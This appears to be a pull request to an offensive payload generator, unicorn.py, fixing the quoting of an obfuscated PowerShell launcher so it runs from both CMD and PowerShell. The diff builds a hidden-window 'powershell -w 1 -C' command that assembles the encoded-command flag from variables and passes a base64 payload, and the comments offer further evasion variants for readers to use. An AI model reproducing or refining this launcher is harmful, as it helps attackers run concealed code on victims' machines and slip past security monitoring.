### PR TITLE
Fix quoting to launch attack from CMD and Powershell

### DIFF
--- a/unicorn.py
+++ b/unicorn.py
@@ -396,8 +396,8 @@ def format_payload(powershell_code, attack_type, attack_modifier, option):
 
     # powershell -w 1 -C "powershell ([char]45+[char]101+[char]99) YwBhAGwAYwA="  <-- Another nasty one that should evade. If you are reading the source, feel free to use and tweak
     #"sv x -;sv y ec;sv Z ((gv x).value.toString()+(gv y).value.toString());powershell (gv Z).value.toString()"
-    full_attack = 'powershell -w 1 -C "sv %s -;sv %s ec;sv %s ((gv %s).value.toString()+(gv %s).value.toString());powershell (gv %s).value.toString() "' % (ran1, ran2, ran3, ran1, ran2, ran3) + \
-        base64.b64encode(powershell_code.encode('utf_16_le')) + '"'
+    full_attack = 'powershell -w 1 -C "sv %s -;sv %s ec;sv %s ((gv %s).value.toString()+(gv %s).value.toString());powershell (gv %s).value.toString() \'' % (ran1, ran2, ran3, ran1, ran2, ran3) + \
+        base64.b64encode(powershell_code.encode('utf_16_le')) + '\'"'
 
     if attack_type == "msf":
         if attack_modifier == "macro":


### PR DESCRIPTION
In it's current version, the attack payload only works if it is executed from a CMD shell, but refuses to work from a Powershell shell. The proposed changes should fix that.